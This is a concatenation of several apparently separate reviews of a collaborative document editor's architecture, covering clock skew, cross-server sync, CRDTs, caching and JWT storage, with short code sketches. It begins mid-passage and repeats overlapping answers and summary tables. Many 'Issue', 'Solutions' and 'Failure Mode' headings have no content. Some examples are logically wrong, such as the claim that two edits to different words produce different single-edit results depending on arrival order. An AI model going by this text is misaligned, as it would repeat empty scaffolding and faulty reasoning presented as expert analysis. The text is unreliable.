Critical metrics that are not captured include WebSocket connection counts per server, change propagation latency between servers, database query latency distributions, cache hit rates, error rates by endpoint, and authentication failure rates. Without these metrics, the system operates in a visibility vacuum where problems are discovered only through user reports.
Proposed Solution: Comprehensive Observability Pipeline
Implement structured logging, metrics collection, and distributed tracing. Each API request and WebSocket operation should generate logs with correlation IDs enabling request tracing across services. Metrics should be collected for all operational components and aggregated for alerting.
The trade-off is operational investment rather than technical complexity. The observability pipeline requires logging infrastructure (Elasticsearch, Splunk, or cloud equivalent), metrics storage (Prometheus, Datadog, or cloud equivalent), and dashboards for visualization. Alerting rules must be defined and tuned to avoid alert fatigue while catching genuine issues.
The following table summarizes all identified issues with their severity, proposed solutions, and key trade-offs:
| Issue | Severity | Solution | Primary Trade-off |
|---|---|---|---|
| Clock Skew Destruction | Critical | OT/CRDT with Server Ordering | Implementation Complexity |
| Inter-Server Polling | Critical | Pub/Sub Message Broker | Operational Overhead |
| Full Snapshot Persistence | High | Operational Log + Snapshots | Recovery Complexity |
| WebSocket Fragmentation | High | Sticky Sessions + External State | Reduced LB Flexibility |
| JWT Vulnerabilities | High | HTTP-Only Cookies + Refresh Tokens | CSRF Vulnerability |
| Concurrent Edit Loss | High | Operational Transformation | Correctness Verification |
| Document Load Inconsistency | Medium | Version Acknowledgment Protocol | Additional Round-Trip |
| Cache Stampede | Medium | Early Expiration + Coalescing | Slightly Stale Data |
| Write Throughput Limits | High | Write Buffering with Batching | Data Loss Window |
| Connection Density | Medium | Dedicated WebSocket Gateway | Infrastructure Overhead |
| Redis Contention | Medium | Tiered Caching | Eventual Consistency |
| Connection Pool Exhaustion | Medium | Connection Pooling Proxy | Single Point of Failure |
Organizations should address issues in the following order for maximum risk reduction:
Phase 1 (Immediate): Implement HTTP-only cookies with refresh tokens to address JWT vulnerabilities. This provides significant security improvement with moderate implementation effort and no architectural changes.
Phase 2 (High Priority): Replace polling with Redis Pub/Sub for inter-server synchronization. This eliminates the 2-second latency window and removes a significant race condition, though it requires Redis infrastructure changes.
Phase 3 (Critical): Implement Operational Transformation for conflict resolution. This is the most complex change but addresses the fundamental data loss issue inherent in last-write-wins. Consider using an existing CRDT library to reduce implementation burden.
Phase 4 (Scalability): Implement write buffering and connection pooling to address database bottlenecks. These changes enable horizontal scaling beyond the current architecture's limits.
Phase 5 (Resilience): Add reconnection protocols, observability, and WebSocket gateway architecture for production resilience.
The architecture can operate with Phase 1 and Phase 2 implemented while Phase 3 is in development, providing meaningful improvement while the comprehensive solution is developed. Phases should not be skipped entirely—operating with known vulnerabilities (particularly the JWT issues) is inappropriate for any production system handling sensitive documents.
Set Cache-Control: private, no-cache on private data and serve real-time data through a separate WebSocket endpoint.

| Issue | Solution | Trade-offs |
|---|---|---|
| Cross-server broadcast | Pub/Sub message broker | Added latency, complexity |
| Conflict resolution | CRDT/OT | Implementation complexity, overhead |
| Write bottleneck | Buffered batch writes | Data loss risk, latency |
| Polling | Event-driven notifications | PostgreSQL-specific, scaling |
| CDN caching | Private cache headers | Reduced caching benefits |
| JWT expiry | Refresh tokens | Security and complexity |
| Read replica lag | WebSocket initial load | Latency |
| Partitioning | Consistent hashing | Rebalancing complexity |
| Reconnection | Sticky sessions/distributed cache | Uneven load, latency |
| Snapshots | Incremental operations + compaction | Recovery complexity |
| Redis failure | Redis Sentinel/Cluster | Cost, fallback security |
| XSS | HttpOnly cookies | HTTPS requirement |
| Load balancer | Sticky sessions | Uneven load |
| Race conditions | Database locking | Throughput reduction |
| Message ordering | Sequence numbers | Overhead |
These issues highlight the complexity of building a real-time collaborative editor at scale. While the proposed solutions address specific problems, they often introduce trade-offs in consistency, latency, complexity, or cost. A thorough evaluation of user experience requirements and system constraints is essential when deciding which improvements to implement.
Your architecture contains fundamental design issues that will cause data loss, inconsistency, and scaling failures under real-world conditions. Let me systematically enumerate each problem with concrete solutions and trade-offs.
Problem:
User A (clock: 10:00:00.000) → Types "Hello" → timestamp: 10:00:00.000
User B (clock: 09:59:59.500, 500ms behind) → Types "World" → timestamp: 09:59:59.500
User B typed after User A, but their timestamp is earlier, so ordering by client timestamps produces "WorldHello" instead of "HelloWorld"; worse, if both edits target the same paragraph, last-write-wins keeps User A's older change and discards User B's genuinely newer one. Client clock skew is endemic—laptops with incorrect time, timezone changes, OS clock adjustments.
Failure Mode: Edits are silently discarded or reordered whenever a client's clock runs behind; the document's final state depends on clock accuracy rather than on the actual order of edits.
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Server-assigned sequence numbers | Each mutation gets a monotonically increasing integer from the server | Single point of contention; throughput limited to server's sequencing capacity |
| Hybrid Logical Clocks (HLC) | Combines physical time with logical counters; guarantees causal ordering | Additional complexity in implementation; HLC can drift from wall-clock time |
| Operational Transformation (OT) | Transform operations against each other to maintain intent | Exponential complexity in OT proofs; notoriously difficult to implement correctly |
| CRDTs (Conflict-free Replicated Data Types) | Mathematically proven eventual consistency; no coordination needed | Memory overhead; limited to certain data structures; doesn't preserve document order naturally without additional work |
Recommendation: Use CRDTs (Yjs or Automerge) for character-level merging. Avoid homegrown conflict resolution.
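For completeness, the Hybrid Logical Clock option from the table can be sketched in a few lines. The point is that a receiver folds the sender's timestamp into its own clock, so causally later events always compare later even when wall clocks disagree:

```typescript
interface Hlc { wall: number; logical: number; }

function hlcSend(local: Hlc, now: number): Hlc {
  if (now > local.wall) return { wall: now, logical: 0 };
  return { wall: local.wall, logical: local.logical + 1 };
}

function hlcReceive(local: Hlc, remote: Hlc, now: number): Hlc {
  const wall = Math.max(local.wall, remote.wall, now);
  let logical: number;
  if (wall === local.wall && wall === remote.wall) logical = Math.max(local.logical, remote.logical) + 1;
  else if (wall === local.wall) logical = local.logical + 1;
  else if (wall === remote.wall) logical = remote.logical + 1;
  else logical = 0;
  return { wall, logical };
}

function hlcCompare(a: Hlc, b: Hlc): number {
  return a.wall !== b.wall ? a.wall - b.wall : a.logical - b.logical;
}
```

Replaying the skewed-clock example: User A stamps "Hello" at wall time 1000; User B's clock reads only 500, but after receiving A's update, B's next stamp still compares greater than A's.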
Problem:
Server 1 polls at T=0.000 → Gets change C1
Server 2 polls at T=0.100 → Gets change C1
Server 1 broadcasts C1 to its clients
Server 2 broadcasts C1 to its clients
If Server 1 and Server 2 both serve the same document, clients receive duplicate broadcasts. Worse, if Server 2's poll occurs during Server 1's broadcast, clients on Server 2 might see C1 twice—or miss it entirely if ordering is imperfect.
Failure Mode: Duplicate broadcasts, missed changes when polls and broadcasts interleave, and up to 2 seconds of propagation delay during which clients on different servers see different document states.
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Pub/Sub layer (Redis or Kafka) | All servers subscribe to document channels; single source of truth | Additional infrastructure; Redis cluster adds complexity; single Redis = SPOF |
| WebSocket bridging | One server designated as "owner" per document; others proxy through owner | Owner becomes bottleneck; ownership transfer on failure is complex |
| Message Queue (RabbitMQ/Redis Streams) | Changes published to queue; all servers consume | Requires guaranteed ordering per document; added latency; operational overhead |
Recommendation: Redis Pub/Sub with server-side fanout. Accept Redis as a critical dependency and run it with Sentinel (or in Cluster mode) for high availability.
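Even with a pub/sub layer, a server can see the same change twice (broker redelivery, or an overlapping poll and subscription during migration). Tagging each change with a per-document sequence number makes the fanout idempotent, as this sketch shows (the message shape is an assumption):

```typescript
interface DocChange { docId: string; seq: number; op: string; }

class DedupFanout {
  // Highest sequence number forwarded so far, per document.
  private lastSeq = new Map<string, number>();
  constructor(private broadcast: (change: DocChange) => void) {}

  onMessage(change: DocChange): void {
    const seen = this.lastSeq.get(change.docId) ?? 0;
    if (change.seq <= seen) return; // duplicate or stale delivery: drop
    this.lastSeq.set(change.docId, change.seq);
    this.broadcast(change);
  }
}
```

A delivery stream of sequences 1, 2, 2, 1, 3 reaches connected clients exactly once each, in order.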
Problem:
Document state at T=0: "The quick brown fox"
User A selects "quick" → deletes → types "slow"
User B selects "brown" → deletes → types "red"
Server receives:
- Op1: replace(range("quick"), "slow")
- Op2: replace(range("brown"), "red")
If Op1 arrives first: "The slow brown fox"
If Op2 arrives first: "The quick red fox"
Last-write-wins doesn't apply here—both operations target different positions. But if operations arrive out of order, or if deletion shifts indices, the final state is undefined.
Failure Mode: Clients converge on different final states depending on operation arrival order, and index shifts from deletions corrupt subsequent operations.
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Character-level CRDTs | Each character is an insert/delete operation with unique IDs | Larger document size (2-10x); slower serialization |
| Fine-grained locking | Lock at paragraph level during edits | Blocks other users; poor user experience; deadlocks possible |
| Transform-based approaches (OT/CRDT) | Operations are transformed against each other | Significant implementation complexity |
Recommendation: CRDTs. The storage overhead is acceptable for collaborative editing.
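A toy illustration of the character-level idea, using fractional positions rather than a production algorithm: each character owns an immutable (position, site, counter) key, and the document is just the sorted set of characters, so merging is set union plus a deterministic sort. Note the caveat: this naive scheme converges, but it can interleave concurrent runs of text, an anomaly that libraries like Yjs are engineered to avoid.

```typescript
interface Ch { pos: number; site: string; ctr: number; ch: string; }

function keyCompare(a: Ch, b: Ch): number {
  return a.pos - b.pos || a.site.localeCompare(b.site) || a.ctr - b.ctr;
}

class FracDoc {
  private chars: Ch[] = [];
  private ctr = 0;
  constructor(private site: string) {}

  // Insert `text` between index i-1 and i; positions are evenly spaced midpoints.
  insertAt(i: number, text: string): Ch[] {
    const lo = i === 0 ? 0 : this.chars[i - 1].pos;
    const hi = i === this.chars.length ? 1 : this.chars[i].pos;
    const ops: Ch[] = [];
    for (let k = 0; k < text.length; k++) {
      const pos = lo + ((hi - lo) * (k + 1)) / (text.length + 1);
      ops.push({ pos, site: this.site, ctr: ++this.ctr, ch: text[k] });
    }
    ops.forEach(op => this.apply(op));
    return ops;
  }

  apply(op: Ch): void {
    // Idempotent: (site, ctr) uniquely identifies a character.
    if (this.chars.some(c => c.site === op.site && c.ctr === op.ctr)) return;
    this.chars.push(op);
    this.chars.sort(keyCompare);
  }

  text(): string { return this.chars.map(c => c.ch).join(""); }
}
```

Two replicas that each insert concurrently at position 0 and then exchange operations end with identical text, without any coordination.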
Problem:
T=0: Document saved: "Hello"
T=1: User A adds " World"
T=2: Snapshot begins (slow operation)
T=3: User B adds "!"
T=4: Snapshot completes: "Hello World"
The saved snapshot doesn't include User B's "!"—that character is in PostgreSQL but not in the HTML file. If you restore from the HTML snapshot, you lose the "!".
Failure Mode: Restoring from an HTML snapshot silently drops any edits made while the snapshot was being written.
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Lock during snapshot | Block writes while snapshot is taken | Degrades responsiveness; users notice lag |
| Snapshot includes pending changes | Capture in-flight operations in snapshot | Complexity; potential for inconsistent reads |
| Remove periodic snapshots | Rely on PostgreSQL as source of truth | Increased PostgreSQL load; relies on PostgreSQL being highly available |
Recommendation: Remove periodic HTML snapshots unless you have a specific use case (rendering static versions). Use PostgreSQL for point-in-time recovery with WAL.
Problem:
T=0: User connected to Server A
T=1: User makes change C1 → Server A persists C1
T=2: Server A crashes
T=3: User reconnects to Server B
T=4: Server B polls PostgreSQL → gets C1
T=5: Server B sends C1 to user (but user already has C1)
T=6: Document shows "stale" flash or duplicate change
The user already has the change locally—they made it. But Server B doesn't know that.
Failure Mode: Users see duplicate or flickering changes after reconnecting, and the client's local state can silently diverge from the server's.
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Sequence numbers + acks | Client tracks last-seen sequence; server replays from gap | Complexity; network partitions cause long replay chains |
| Full state sync | Server sends complete document state on reconnect | Slow for large documents; high bandwidth; brief blank screen |
| Incremental sync | Server tracks per-client cursor position; sends from there | Requires persistent connection state per client |
Recommendation: Implement a hybrid: send last known sequence number; if gap > threshold, send incremental diff; if gap > large threshold, send full state.
Problem:
Initial connection: Load balancer → Server A
User edits document extensively
Server A becomes overloaded
Load balancer routes new users to Server B, C, D
Users editing the same document are now on different servers
Server A must broadcast to Server B, C, D
WebSocket connections are persistent and stateful. Round-robin doesn't account for connection lifetime (WebSocket sessions are long-lived), per-connection memory cost, or which server already hosts a document's other collaborators.
Failure Mode: Collaborators on the same document scatter across servers, so every edit requires cross-server broadcast, and that broadcast traffic grows with the number of servers.
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Sticky sessions (source IP or cookie) | Same user always routes to same server | Uneven distribution if users cluster (same org); server failures orphan users |
| Document-aware routing | Route based on document ID to same server | Hot documents create bottlenecks; partitioning required |
| Consistent hashing | Same document ID maps to same server | Rebalancing on server add/remove requires data migration |
Recommendation: Consistent hashing with document ID as key. Accept that hot documents need sharding at the document level (partition by document ID range).
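One way to get stable document-to-server mapping without maintaining an explicit hash ring is rendezvous (HRW) hashing; the sketch below is illustrative (`pickServer` and `fnv1a` are assumed names, and any stable hash would do):

```javascript
// FNV-1a: a simple, stable 32-bit string hash.
function fnv1a(str) {
  let h = 0x811c9dc5;
  for (let i = 0; i < str.length; i++) {
    h ^= str.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h >>> 0;
}

// Rendezvous hashing: each (doc, server) pair gets a score; the highest wins.
// Removing a server only remaps the documents that were on it.
function pickServer(docId, servers) {
  let best = null, bestScore = -1;
  for (const s of servers) {
    const score = fnv1a(docId + '#' + s);
    if (score > bestScore) { bestScore = score; best = s; }
  }
  return best;
}
```

The useful property for WebSocket routing: when a server is added or removed, only documents whose top-scoring server changed move, unlike naive `hash(docId) % N`, which reshuffles nearly everything.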
Problem:
User types at 60 WPM = 5 characters/second
Active users: 1,000
Write rate: 5,000 writes/second to PostgreSQL
Assuming 10ms per write (optimistic), you need 50 concurrent connections to sustain this load. PostgreSQL default max_connections is 100.
Failure Mode:
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Batch writes | Buffer changes; write every N ms or N changes | Data loss on crash; higher latency for persistence |
| Change Data Capture (CDC) | Stream writes to Kafka; async persistence | Complexity; eventual consistency window; operational overhead |
| In-memory log + periodic flush | Append-only log in memory; flush to DB periodically | Risk of losing buffered writes; memory pressure |
Recommendation: Implement a write buffer (ring buffer or write-ahead log) with configurable durability. Acknowledge writes immediately from memory; flush to PostgreSQL asynchronously. Accept configurable data loss window (e.g., "up to 1 second of writes").
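A minimal sketch of such a write buffer, under stated assumptions: `persistBatch` stands in for a batched PostgreSQL insert, and `maxOps`/`flushIntervalMs` are illustrative knobs; a production version would also bound memory and retry failed flushes.

```javascript
class WriteBuffer {
  constructor(persistBatch, { maxOps = 100, flushIntervalMs = 1000 } = {}) {
    this.persistBatch = persistBatch;   // async (ops) => void, e.g. one bulk INSERT
    this.maxOps = maxOps;
    this.pending = [];
    this.timer = setInterval(() => this.flush(), flushIntervalMs);
    if (this.timer.unref) this.timer.unref(); // don't keep the process alive
  }
  write(op) {                           // returns immediately: "ack from memory"
    this.pending.push(op);
    if (this.pending.length >= this.maxOps) return this.flush();
  }
  async flush() {
    if (this.pending.length === 0) return;
    const batch = this.pending;
    this.pending = [];
    await this.persistBatch(batch);     // a crash here loses <= one interval of writes
  }
}
```

This is exactly the "configurable data loss window" trade: the interval bounds how much acknowledged-but-unflushed data a crash can lose.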
Problem:
CloudFront TTL: 5 minutes
User A edits paragraph 1
User B requests document state
CloudFront serves stale version (up to 5 minutes old)
User B sees User A's edits 5 minutes late
Real-time collaborative data should never be cached at the CDN layer.
Failure Mode:
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Cache-Control: no-store | Disable CDN caching for API responses | Higher origin load; no benefit from CDN for dynamic content |
| Cache only static assets | Separate CDN behavior for static vs. dynamic | Need clear separation; can't cache document metadata |
| Short TTL (1-5 seconds) | CDN caches but invalidates quickly | Minimal benefit; added complexity |
Recommendation: Remove CDN caching for all /api/* routes. Use CDN only for static assets (JS, CSS, images). For global distribution, consider edge-computing WebSocket termination (e.g., Cloudflare Workers Durable Objects).
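The routing rule can be captured in one small policy function; `cachePolicyFor` is an illustrative helper, not a CloudFront API, and the path patterns are assumptions:

```javascript
// Map a request path to the Cache-Control header the origin should emit.
function cachePolicyFor(path) {
  if (path.startsWith('/api/')) return 'no-store';            // real-time data: never cache
  if (/\.(js|css|png|svg|woff2?)$/.test(path)) {
    return 'public, max-age=31536000, immutable';             // content-hashed static assets
  }
  return 'no-cache';                                          // HTML shell: revalidate each time
}
```

The `immutable` directive is safe only if asset filenames carry a content hash (e.g. `main.abc123.js`), so a deploy changes the URL rather than the cached body.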
Problem:
Active documents: 10,000
Average document size: 50 KB
Document state per server: 10,000 × 50 KB = 500 MB
CRDT metadata overhead: 3-5x = 1.5-2.5 GB per server
Node.js's default heap limit is around 1.5 GB on older versions (newer versions scale it with available memory). Either way, you hit memory limits quickly.
Failure Mode:
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Document eviction | Unload inactive documents from memory | Reload latency; inconsistent behavior |
| External state store | Store CRDT state in Redis or memory-mapped DB | Redis becomes critical path for every operation |
| Tiered storage | Hot data in memory, cold data on disk | Complexity; added latency for cold documents |
Recommendation: Implement document eviction with LRU policy. Keep only top N active documents per server in memory. Use lazy loading for inactive documents.
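A compact LRU sketch using `Map`'s insertion-order guarantee; `loadDoc` stands in for lazily rehydrating CRDT state from PostgreSQL (an assumption here), and the class name is illustrative:

```javascript
class DocCache {
  constructor(capacity, loadDoc) {
    this.capacity = capacity;
    this.loadDoc = loadDoc;
    this.map = new Map(); // Map iterates in insertion order: oldest entry first
  }
  get(docId) {
    if (this.map.has(docId)) {
      const doc = this.map.get(docId);
      this.map.delete(docId);        // move to most-recently-used position
      this.map.set(docId, doc);
      return doc;
    }
    const doc = this.loadDoc(docId); // cold load: pays the reload latency
    this.map.set(docId, doc);
    if (this.map.size > this.capacity) {
      const oldest = this.map.keys().next().value;
      this.map.delete(oldest);       // evict the least-recently-used document
    }
    return doc;
  }
}
```

The trade-off from the table shows up directly: a document evicted and re-requested pays `loadDoc` again, which is the "reload latency" cost.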
Problem:
localStorage is accessible via JavaScript
XSS vulnerability → attacker reads localStorage → JWT stolen
Attacker uses JWT to authenticate as victim
localStorage is not encrypted at rest. Any JavaScript on your domain (including XSS) can read it.
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| HttpOnly cookies | JWT stored in HttpOnly, Secure cookie | Vulnerable to CSRF; requires SameSite attribute |
| Memory storage | JWT in JavaScript variable (lost on refresh) | Poor UX; requires re-authentication |
| Subresource Integrity + CSP | Prevent inline scripts; reduce XSS surface | Complexity; may break third-party scripts |
Recommendation: HttpOnly cookies with SameSite=Strict and CSRF tokens. If you must use localStorage, implement short-lived tokens (5-15 minutes) with silent refresh.
Problem:
Token issued at 9 AM
User laptop stolen at 10 AM
Attacker has 14 hours of access
Token cannot be revoked without server-side token blacklist
Solutions:
| Solution | Mechanism | Trade-offs |
|---|---|---|
| Short-lived tokens (15 min) + refresh tokens | Rotate tokens frequently; refresh tokens in HttpOnly cookie | Complexity; requires refresh endpoint |
| Token blacklist (Redis) | Revoke tokens on logout or security event | Redis becomes critical path; latency overhead |
| Sliding window expiration | Token validity extended on each use | Non-expiring sessions; harder to revoke |
Recommendation: 15-minute access tokens + 7-day refresh tokens. Refresh tokens stored in HttpOnly cookie, rotated on each use.
| Severity | Issue | Impact | Recommended Fix |
|---|---|---|---|
| Critical | Client-side timestamps | Data corruption | Server-side sequence numbers or CRDTs |
| Critical | Database polling | Inconsistency | Redis Pub/Sub or message queue |
| Critical | No OT/CRDT | Concurrent edit corruption | CRDTs (Yjs, Automerge) |
| Critical | CDN caching real-time data | Stale data served | Disable CDN caching for API |
| High | JWT in localStorage | Token theft via XSS | HttpOnly cookies |
| High | Round-robin load balancing | Uneven distribution | Consistent hashing |
| High | PostgreSQL write amplification | DB overload | Write buffer + async flush |
| Medium | 24-hour token expiry | Long-lived credential theft | Short-lived + refresh tokens |
| Medium | Periodic snapshots | Restore data loss | Rely on PostgreSQL WAL |
| Low | Memory pressure | OOM, GC pauses | LRU eviction |
┌─────────────────────────────────────────────────────────────────────┐
│ Clients (Browser) │
│ WebSocket (wss://) + HTTP API │
└─────────────────────────────────────────────────────────────────────┘
│
┌──────────────┴──────────────┐
│ Global Load Balancer │
│ (L7, cookie-based routing) │
└──────────────┬──────────────┘
│
┌──────────────────────────┼──────────────────────────┐
│ │ │
┌───────┴───────┐ ┌───────┴───────┐ ┌───────┴───────┐
│ Edge Region │ │ Edge Region 2 │ │ Edge Region N │
│ (Cloudflare │ │ (Optional) │ │ (Optional) │
│ Workers) │ └───────────────┘ └───────────────┘
└───────┬───────┘
│ WebSocket Gateway
│ (Sticky sessions per document)
│
┌───────┴───────┐
│ API Server │
│ (Node.js) │◄───► Redis Cluster (Pub/Sub + Session)
│ │◄───► PostgreSQL Primary
│ Yjs/Document │◄───► Kafka (for replay/disaster recovery)
│ CRDT State │
└───────┬───────┘
│
│ Changes persisted via
│ CDC or direct write
│
┌───────┴───────┐
│ PostgreSQL │
│ Replicas (RO) │
└───────────────┘
Key architectural changes:
Here’s a comprehensive analysis of potential failure modes, race conditions, and scaling bottlenecks in this architecture, along with proposed solutions and their trade-offs:
Issue:
Solution:
Issue:
Solutions:
Issue:
Solutions:
version column to detect conflicts and reject stale writes (instead of LWW).
organization_id to distribute load.
Issue:
Solutions:
Issue:
Solutions:
Issue:
Solutions:
Cache-Control: no-cache header or ETag for dynamic content.
Issue:
Solutions:
(organization_id, document_id) or use consistent hashing.
Issue:
Solutions:
/health endpoints and configure the load balancer to remove unhealthy servers.
Issue:
Solutions:
change_id with each operation to deduplicate retries.
change_ids).
Issue:
Solutions:
Issue:
Solutions:
Issue:
Solutions:
sequence_id with each change to order them correctly.
| Issue | Solution | Trade-off |
|---|---|---|
| Clock sync (LWW) | Server-side timestamps or CRDTs | Latency or complexity |
| WebSocket scaling | Redis Pub/Sub or shared WebSocket layer | Cost or vendor lock-in |
| PostgreSQL polling | CDC or logical decoding | Complexity |
| JWT security | HTTP-only cookies + refresh tokens | Mobile app complexity |
| CDN caching | Disable for API or use cache tags | Higher backend load |
| Split-brain | CRDTs or quorum-based writes | Complexity or latency |
| Thundering herd | Randomized polling or change feed | Latency or complexity |
(org_id, doc_id) to distribute load.
These changes would make the system more scalable, resilient, and secure, albeit with added complexity.
Here’s a comprehensive analysis of potential failure modes, race conditions, and scaling bottlenecks in this architecture, along with proposed solutions and their trade-offs:
ip_hash or least_conn) to ensure sticky sessions.
Tokens stored in localStorage are vulnerable to XSS attacks.
Secure and SameSite flags).
| Issue | Solution | Trade-off |
|---|---|---|
| WebSocket connection drops | Heartbeat + exponential backoff | Network overhead |
| WebSocket server failure | Sticky sessions + Redis session store | Complexity |
| LWW conflicts | OT/CRDTs | High complexity |
| Clock skew | Server-authoritative timestamps | Latency |
| PostgreSQL write bottleneck | Batch writes + WAL | Latency |
| Polling overhead | CDC (Debezium) or Redis Pub/Sub | Complexity |
| Full HTML snapshots | Deltas + compression | Complexity |
| Load balancer bottleneck | Least-connections + consistent hashing | Complexity |
| Redis SPOF | Redis Cluster | Operational cost |
| JWT in localStorage | HttpOnly cookies | WebSocket complexity |
| No rate limiting | Redis-based rate limiting | Redis dependency |
| Eventual consistency | CDC or distributed locks | Latency/complexity |
| Hot partitions | Shard by document ID | Query complexity |
| No circuit breakers | Hystrix/Resilience4j | Latency |
| No observability | Distributed tracing | Overhead |
This architecture can work for a small-to-medium scale, but for Google Docs-level scale, consider:
Here’s a comprehensive analysis of potential failure modes, race conditions, and scaling bottlenecks in this architecture, along with proposed solutions and their trade-offs:
UPDATE ... WHERE version = X) to avoid lost updates.
google-diff-match-patch).
synchronous_commit = remote_apply in PostgreSQL).
Tokens stored in localStorage are vulnerable to XSS attacks. If an attacker injects JavaScript, they can steal the token.
localStorage.
SameSite and CSRF tokens).
ulimit -n).
ws library with connection reuse).
no-cache for dynamic endpoints).
INCR + EXPIRE).
| Issue | Solution | Trade-off |
|---|---|---|
| WebSocket disconnections | Heartbeat + exponential backoff | Network overhead |
| Cross-server sync latency | Redis Pub/Sub or PostgreSQL CDC | Complexity, Redis persistence |
| Clock skew in LWW | Server-side timestamps or OT/CRDTs | Latency or implementation complexity |
| PostgreSQL write contention | Batch writes + optimistic locking | Latency or retry logic |
| Full HTML snapshots | Store deltas instead | Complex conflict resolution |
| JWT in localStorage | HTTP-only cookies + refresh tokens | CSRF risk |
| WebSocket connection limits | Dedicated WebSocket service | Cost, vendor lock-in |
| Concurrent edits | OT/CRDTs or paragraph-level merging | Complexity |
| PostgreSQL SPOF | Multi-AZ setup + automatic failover | Cost, complexity |
| No offline support | Client-side offline editing | Complex sync logic |
This architecture is workable but has several scalability and reliability risks. Addressing these issues will make it more robust for production use.
This architecture has several potential failure modes, race conditions, and scaling bottlenecks. Below is a detailed analysis with proposed solutions and their trade-offs:
Issue: Each API server maintains its own WebSocket connections, meaning clients connected to different servers won’t receive real-time updates from each other. This breaks the collaborative experience.
Solution:
Issue: Relying on client timestamps for conflict resolution is unreliable due to clock skew. Two users editing the same paragraph could lead to lost updates if timestamps are close.
Solution:
Issue: Servers poll PostgreSQL every 2 seconds, which is inefficient and doesn’t scale well with many servers.
Solution:
Issue: Saving full HTML snapshots every 30 seconds is inefficient for large documents and can lead to high storage costs.
Solution:
Issue: Storing JWT tokens in localStorage is vulnerable to XSS attacks.
Solution:
Issue: Caching API responses for 5 minutes in CloudFront can lead to stale document data.
Solution:
Issue: Read replicas can serve stale data, leading to inconsistencies in real-time collaboration.
Solution:
Issue: If one organization has a very active document, its partition could become a bottleneck.
Solution:
Issue: Changes are only broadcast to clients connected to the same server, requiring other servers to poll for updates.
Solution:
Issue: A malicious user could spam WebSocket messages, overwhelming the server.
Solution:
These changes would significantly improve reliability, scalability, and security but come with added complexity and operational overhead.
This architecture has several potential failure modes, race conditions, and scaling bottlenecks. Below is a detailed analysis with proposed solutions and their trade-offs.
Recommended Solution: Option 1 (Redis-backed WebSocket service) for simplicity and real-time guarantees.
transaction_id or a sequential ID).
Recommended Solution: Option 2 (OT or CRDTs) for correctness, but if simplicity is key, Option 1 (server-assigned timestamps) is a good compromise.
Recommended Solution: Option 1 (CDC with Kafka) for real-time sync without polling.
org_id).
Recommended Solution: Option 1 (sharding) + Option 3 (optimized snapshots) for a balanced approach.
localStorage.
Recommended Solution: Option 1 (HttpOnly cookies + short-lived tokens) for better security.
ETag headers and let clients use If-None-Match.
ETag matches.
Recommended Solution: Option 1 (cache invalidation) for a balance between freshness and performance.
Recommended Solution: Option 1 (WAL) + Option 2 (frequent snapshots with deltas) for durability.
| Issue | Solution | Trade-offs |
|---|---|---|
| WebSocket server affinity | Redis-backed WebSocket service | Adds Redis dependency |
| Last-write-wins conflicts | Operational Transformation (OT) | Complex to implement |
| Polling-based inter-server sync | PostgreSQL CDC + Kafka | Adds Kafka complexity |
| PostgreSQL write bottlenecks | Sharding + optimized snapshots | Cross-shard transactions |
| JWT security risks | HttpOnly cookies + short-lived tokens | More token rotation logic |
| Stale CDN caches | Cache invalidation on write | CloudFront invalidation costs |
| Snapshot data loss | Write-ahead log (WAL) | Recovery complexity |
org_id and optimize snapshots.
This makes the system more scalable, fault-tolerant, and correct while keeping complexity manageable.
Based on the provided architecture, here are potential failure modes, race conditions, and scaling bottlenecks along with proposed solutions and their trade-offs:
Database Write Contention
WebSocket Connection Loss
Last-Write-Wins Conflict Resolution
API Server Polling Latency
CDN Caching Invalidation
Single Point of Failure (Load Balancer)
Document Partitioning by Organization ID
API Server Desync
Addressing these failure modes, race conditions, and scaling bottlenecks will improve the overall reliability, performance, and scalability of the real-time collaborative document editor. However, each solution comes with its own trade-offs that should be carefully considered based on the specific use case and requirements.
Here’s a comprehensive analysis of potential failure modes, race conditions, and scaling bottlenecks in your real-time collaborative document editor architecture, along with proposed solutions and trade-offs:
Failure Modes:
Race Conditions:
Solutions:
WebSocket Heartbeats + Reconnection Logic:
session_token (JWT) to the new server, which fetches the latest document state from PostgreSQL and replays missed changes.
Sticky Sessions (if using load balancer):
Failure Modes:
Race Conditions:
Solutions:
Hybrid Logical Clocks (HLC):
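A compact HLC sketch (illustrative; the class name and fields are assumptions): timestamps stay close to wall-clock time but remain totally ordered even when client clocks are skewed, which is exactly what naive LWW lacks.

```javascript
class HLC {
  constructor(now = () => Date.now()) {
    this.now = now;
    this.wall = 0;     // max wall-clock time observed so far
    this.logical = 0;  // tie-breaker counter within one wall tick
  }
  tick() {             // local event or message send
    const t = this.now();
    if (t > this.wall) { this.wall = t; this.logical = 0; }
    else { this.logical++; }
    return { wall: this.wall, logical: this.logical };
  }
  receive(remote) {    // merge a remote timestamp on message receipt
    const t = this.now();
    const w = Math.max(t, this.wall, remote.wall);
    if (w === this.wall && w === remote.wall) {
      this.logical = Math.max(this.logical, remote.logical) + 1;
    } else if (w === this.wall) this.logical++;
    else if (w === remote.wall) this.logical = remote.logical + 1;
    else this.logical = 0;
    this.wall = w;
    return { wall: this.wall, logical: this.logical };
  }
}
```

Comparing `(wall, logical)` pairs lexicographically gives an ordering consistent with causality: an event that has seen another always sorts after it, regardless of local clock skew.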
Operational Transformation (OT) or CRDTs:
Failure Modes:
Race Conditions:
Solutions:
Change Data Capture (CDC):
Redis Pub/Sub for Cross-Server Communication:
Scaling Bottlenecks:
Failure Modes:
Solutions:
Delta Snapshots:
Shard by Document ID:
organization_id (as planned) but also shard PostgreSQL by document ID to distribute write load.
Caching Frequently Edited Documents:
organization_id as key).
Failure Modes:
Race Conditions:
Solutions:
Short-Lived Tokens + Refresh Tokens:
/refresh endpoint.
WebSocket-Level Authentication:
Failure Modes:
Solutions:
Multi-Layer Caching:
Redis Sentinel or Cluster:
Failure Modes:
GET /documents/:id) may be cached incorrectly.Solutions:
Cache Invalidation Headers:
Cache-Control: no-cache or max-age=0 for mutable endpoints (e.g., document updates).
main.[hash].js) to bust cache on deploy.
